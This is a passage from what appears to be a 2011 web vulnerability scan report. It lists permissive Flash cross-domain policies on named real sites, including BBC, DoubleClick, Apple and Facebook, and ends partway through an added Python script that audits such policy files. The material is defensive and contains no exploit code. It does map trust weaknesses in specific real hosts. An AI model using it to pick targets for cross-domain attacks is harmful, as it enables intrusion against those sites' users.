<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

4.30. http://feeds.bbci.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Thu, 21 Jul 2011 16:05:19 GMT
Date: Thu, 21 Jul 2011 16:03:19 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.31. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Wed, 20 Jul 2011 20:22:21 GMT
Expires: Thu, 21 Jul 2011 20:22:21 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 70890

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.32. http://images.apple.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://images.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: images.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
X-Cached-Time: Wed, 20 Jul 2011 20:45:03 GMT
Server: Apache/2.2.14 (Unix)
Content-Length: 141
Content-Type: application/xml
Cache-Control: max-age=586
Expires: Thu, 21 Jul 2011 20:41:39 GMT
Date: Thu, 21 Jul 2011 20:31:53 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

4.33. http://mm.chitika.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mm.chitika.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mm.chitika.net

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:23:51 GMT
Server: Apache
Last-Modified: Mon, 02 Jun 2008 19:48:27 GMT
ETag: "35d0385-23d-44eb4477878c0"
Accept-Ranges: bytes
Content-Length: 573
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="vip.unitedsites.com.ar" />
   <allow-access-from domain="*.unitedsites.com.ar" />
   <allow-access-from domain="*.shleper.net" />
   <allow-access-from domain="*.shoshkeles.com" />
   <allow-access-from domain="*.unitedvirtualities.com" />
   <allow-access-from domain="*.akamai.net" />
   <allow-access-from domain="*.chitika.com" />
   <allow-access-from domain="*.chitika.net" />
<allow-access-from domain="208.78.43.149" />
<allow-access-from domain="*.2c-studio.com" />
...[SNIP]...

4.34. http://newsrss.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=9
Expires: Thu, 21 Jul 2011 16:03:27 GMT
Date: Thu, 21 Jul 2011 16:03:18 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.35. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Wed, 20 Jul 2011 20:22:59 GMT
Expires: Thu, 21 Jul 2011 20:22:59 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 71384

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.36. http://pubads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Thu, 21 Jul 2011 11:13:02 GMT
Expires: Fri, 22 Jul 2011 11:13:02 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 17979
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.37. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.184
Date: Thu, 21 Jul 2011 16:21:20 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.38. http://www.apple.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.14 (Unix)
X-N: S
X-Cached-Time: Mon, 21 Mar 2011 16:49:30 GMT
nnCoection: close
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=206
Expires: Thu, 21 Jul 2011 20:28:22 GMT
Date: Thu, 21 Jul 2011 20:24:56 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

4.39. http://www.disqus.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.disqus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.disqus.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:24:21 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Length: 244
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

4.40. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. The policy also sets site-control permitted-cross-domain-policies="master-only", so Flash Player ignores any other policy file on the host; that is the recommended setting and limits the review to the entries in this file.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.64.124.60
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.41. http://www.scmagazineus.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scmagazineus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Both visible entries (*.brightcove.com and *.google-analytics.com) are third-party domains outside the application's control, so a compromised or attacker-controlled host under either of them could perform two-way interaction with www.scmagazineus.com in the security context of a logged-in user.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scmagazineus.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 21 Sep 2009 15:39:52 GMT
Accept-Ranges: bytes
ETag: "6cd10c3d13aca1:0"
Server: Microsoft-IIS/7.5
From: VM-Web1
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 20:13:11 GMT
Connection: close
Content-Length: 292

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
...[SNIP]...

5. Silverlight cross-domain policy
There are 9 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
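The Flash crossdomain.xml findings above and the Silverlight clientaccesspolicy.xml findings below come down to one review: which origins the policy trusts, and with what extras (a bare "*", wildcard domains, secure="false", http-request-headers="*", a grant covering the whole site). The auditor below is an added example written for this page; it is not Burp Suite output and not code from any site listed in the report. It parses both formats with Python's standard library and rates each entry. The sample policies are constructed: three are modelled on the apple.com, disqus.com and ad.doubleclick.net responses in this report (DOCTYPE declarations dropped), and the tightened Silverlight sample is invented for contrast, reusing the named origins from 5.7.

```python
"""Audit Flash crossdomain.xml and Silverlight clientaccesspolicy.xml files for
the permissive settings flagged in this report (added example, stdlib only)."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

SEVERITY_RANK = {"info": 0, "low": 1, "high": 2}


@dataclass(frozen=True)
class Finding:
    severity: str  # "info" | "low" | "high"
    message: str


def _rate_origin(kind, value):
    """'*' opens the policy to every domain; '*.x' trusts every host under x."""
    if value == "*":
        return Finding("high", f"{kind} '*' allows any domain")
    if "*" in value:
        return Finding("low", f"{kind} '{value}' is a wildcard; every host under it is trusted")
    return Finding("info", f"{kind} '{value}' is a single named host")


def audit_flash(xml_bytes):
    """Findings for a Flash policy (root element <cross-domain-policy>)."""
    root = ET.fromstring(xml_bytes)
    if root.tag != "cross-domain-policy":
        raise ValueError("not a Flash cross-domain policy")
    findings = []
    site_control = root.find("site-control")
    if site_control is None:
        findings.append(Finding("low", 'no <site-control>; add permitted-cross-domain-policies="master-only" '
                                       "so other policy files on the host are ignored"))
    elif site_control.get("permitted-cross-domain-policies") == "all":
        findings.append(Finding("high", 'site-control "all" honours a policy file anywhere on the host'))
    for el in root.findall("allow-access-from"):
        domain = el.get("domain", "")
        findings.append(_rate_origin("allow-access-from", domain))
        # secure="false" matters only when the policy is served over HTTPS: it then
        # lets SWFs loaded over plain HTTP use the policy (see disqus.com, 4.39).
        if el.get("secure", "true").lower() == "false":
            findings.append(Finding("low", f'"{domain}" has secure="false"'))
    for el in root.findall("allow-http-request-headers-from"):
        findings.append(_rate_origin("allow-http-request-headers-from", el.get("domain", "")))
    return findings


def audit_silverlight(xml_bytes):
    """Findings for a Silverlight policy (root element <access-policy>)."""
    root = ET.fromstring(xml_bytes)
    if root.tag != "access-policy":
        raise ValueError("not a Silverlight client access policy")
    findings = []
    for policy in root.iter("policy"):
        allow = policy.find("allow-from")
        if allow is None:
            continue
        for dom in allow.findall("domain"):
            findings.append(_rate_origin("domain uri", dom.get("uri", "")))
        if allow.get("http-request-headers") == "*":
            findings.append(Finding("low", 'http-request-headers="*" lets callers send arbitrary request headers'))
        grant = policy.find("grant-to")
        for res in ([] if grant is None else grant.findall("resource")):
            if res.get("path") == "/" and res.get("include-subpaths") == "true":
                findings.append(Finding("low", 'grant-to covers the whole site (path="/", include-subpaths="true")'))
    return findings


def audit(xml_bytes):
    """Dispatch on the root element so one call handles either file type."""
    if ET.fromstring(xml_bytes).tag == "cross-domain-policy":
        return audit_flash(xml_bytes)
    return audit_silverlight(xml_bytes)


def worst(findings):
    """Highest severity present, or 'none' for an empty list."""
    return max((f.severity for f in findings), key=SEVERITY_RANK.get, default="none")


# Constructed samples, modelled on responses in this report (DOCTYPEs omitted).
FLASH_APPLE = b"""<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>"""

FLASH_DISQUS = b"""<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
</cross-domain-policy>"""

SILVERLIGHT_OPEN = b"""<?xml version="1.0" encoding="utf-8"?>
<access-policy><cross-domain-access><policy>
<allow-from http-request-headers="*"><domain uri="*" /></allow-from>
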